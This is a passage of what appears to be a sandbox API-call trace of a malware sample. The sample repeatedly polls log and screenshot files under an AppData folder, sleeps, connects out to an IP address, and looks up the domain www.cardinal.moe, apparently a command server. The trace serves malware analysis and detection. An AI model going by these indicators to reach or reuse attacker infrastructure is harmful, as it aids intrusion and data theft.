IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0229.192] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0229.192] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0229.192] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0229.192] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0229.192] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0229.192] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0229.192] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0229.192] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0229.192] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0229.192] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0229.192] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0229.192] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0229.192] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0229.192] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0229.192] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0229.192] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0229.192] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0229.192] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0229.192] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0229.192] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0229.192] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0229.192] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0229.192] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0229.192] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef600*=0xffffffffffffffff, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0229.193] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0x11 [0229.193] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0229.193] Sleep (dwMilliseconds=0x7d0) [0229.198] Sleep (dwMilliseconds=0x7d0) [0229.214] Sleep (dwMilliseconds=0x7d0) [0229.230] Sleep (dwMilliseconds=0x7d0) [0229.245] Sleep (dwMilliseconds=0x7d0) [0229.261] Sleep (dwMilliseconds=0x7d0) [0229.281] Sleep (dwMilliseconds=0x7d0) [0229.293] Sleep (dwMilliseconds=0x7d0) [0229.308] Sleep (dwMilliseconds=0x7d0) [0229.323] Sleep (dwMilliseconds=0x7d0) [0229.344] Sleep (dwMilliseconds=0x7d0) [0229.354] Sleep (dwMilliseconds=0x7d0) [0229.370] Sleep (dwMilliseconds=0x7d0) [0229.386] socket (af=2, type=1, protocol=6) returned 0x2e4 [0229.386] connect (s=0x2e4, name=0x70acf30*(sa_family=2, sin_port=0x50, sin_addr="216.239.36.21"), namelen=16) returned 0 [0229.413] send (s=0x2e4, buf=0x25a505a*, len=173, flags=0) returned 173 [0229.414] setsockopt (s=0x2e4, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0229.414] recv (in: s=0x2e4, buf=0x93af040, len=2048000, flags=0 | out: buf=0x93af040*) returned 47497 [0229.565] closesocket (s=0x2e4) returned 0 [0229.566] Sleep (dwMilliseconds=0x7d0) [0229.573] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0229.573] NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0229.573] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0x11 [0229.573] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0229.573] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0229.573] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0229.573] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0229.573] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0229.573] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0229.573] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0229.574] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0229.574] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0229.574] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0229.574] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0229.574] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0229.574] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0229.574] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0229.574] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0229.574] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0229.574] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0229.574] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0229.574] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0229.574] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0229.574] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0229.574] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0229.574] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0229.574] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0229.575] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0229.575] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0229.575] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0229.575] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0229.575] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0229.575] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0229.575] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0229.575] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0229.575] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0229.575] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0229.575] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0229.575] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0229.575] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0229.575] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0229.575] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef600*=0xffffffffffffffff, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0229.575] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0x11 [0229.575] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0229.575] Sleep (dwMilliseconds=0x7d0) [0229.589] Sleep (dwMilliseconds=0x7d0) [0229.608] Sleep (dwMilliseconds=0x7d0) [0229.620] Sleep (dwMilliseconds=0x7d0) [0229.636] Sleep (dwMilliseconds=0x7d0) [0229.651] Sleep (dwMilliseconds=0x7d0) [0229.666] Sleep (dwMilliseconds=0x7d0) [0229.682] Sleep (dwMilliseconds=0x7d0) [0229.698] Sleep (dwMilliseconds=0x7d0) [0229.713] Sleep (dwMilliseconds=0x7d0) [0229.745] Sleep (dwMilliseconds=0x7d0) [0229.760] Sleep (dwMilliseconds=0x7d0) [0229.776] Sleep (dwMilliseconds=0x7d0) [0229.791] Sleep (dwMilliseconds=0x7d0) [0229.807] Sleep (dwMilliseconds=0x7d0) [0229.827] Sleep (dwMilliseconds=0x7d0) [0229.839] Sleep (dwMilliseconds=0x7d0) [0229.855] Sleep (dwMilliseconds=0x7d0) [0229.869] getaddrinfo (in: pNodeName="www.cardinal.moe", pServiceName="80", pHints=0x6f0e6d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6f0e708 | out: ppResult=0x6f0e708*=0x0) returned 11001 [0229.889] Sleep (dwMilliseconds=0x7d0) [0229.901] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0229.901] NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0229.901] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0x11 [0229.901] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0229.901] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0229.901] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0229.901] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0229.901] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0229.901] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: 